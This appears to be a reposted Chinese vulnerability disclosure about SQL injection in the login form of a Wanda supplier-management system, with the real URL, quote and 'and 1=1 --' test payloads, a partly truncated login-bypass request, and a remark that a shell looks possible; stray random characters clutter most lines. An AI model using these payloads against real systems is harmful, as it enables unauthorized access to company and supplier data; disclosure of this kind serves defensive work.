万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
& `$ N: ]5 C' u6 S万达scm系统登陆框sql注入。

" P/ n: e& u7 ?7 `7 L$ xhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


500错误。
: q. b: j2 t1 N( B& o5 O" E: A
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
- t  ~& e3 T3 h( Q4 Phttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
$ B$ V1 v/ }  R  e! E7 n$ _# s; ^经过分析，登陆验证的过程应该是：
: R! y! B" r2 u" F' Q$ @
取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
: y0 `0 w  f, x: V4 w1 Uhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

  L" _4 e" k( F- Woracle数据库，存在注入点。@大连万达，你怎么看？
. V* `7 z$ G" _; Z/ Dhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

3 ~- c' c% k1 J系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
: P0 o* a: R% |8 s6 C, t漏洞证明：
万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


500错误。
0 |( w# A1 N6 b7 g# Y
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
2 v+ }9 w3 Y' G' Fhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png

' B0 d. R1 ?2 G0 {0 r
5 L7 e* _) c# `（截图有一点问题）

2 X4 \9 G: q. q3 |怎么饶都饶不过去；经过分析，登陆验证的过程应该是：
" }- m# W# t3 N( a& A
取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。

+ b/ L7 ~* G5 u* N4 |  P* C绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
. W5 e' k& a# V0 u! p' q

6 Y) q6 t* x3 o  M6 r/ Soracle数据库，存在注入点。@大连万达，你怎么看？
​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

, j$ B' z6 v4 R5 a修复方案：
# ^# E+ _& S7 d9 M1 M. r。。。
5 e3 A* K) K8 k" A" G9 m, B, [

厂商已经确认
1 J  ~. c3 d& C9 m
[/td][/tr]
: N! v% v/ }2 d3 ]6 M5 r[/table]
  H4 S3 {) H9 r. N8 A
0 P: |( G$ H8 Z. t- `! }
+ l- w) w/ L5 y& h6 s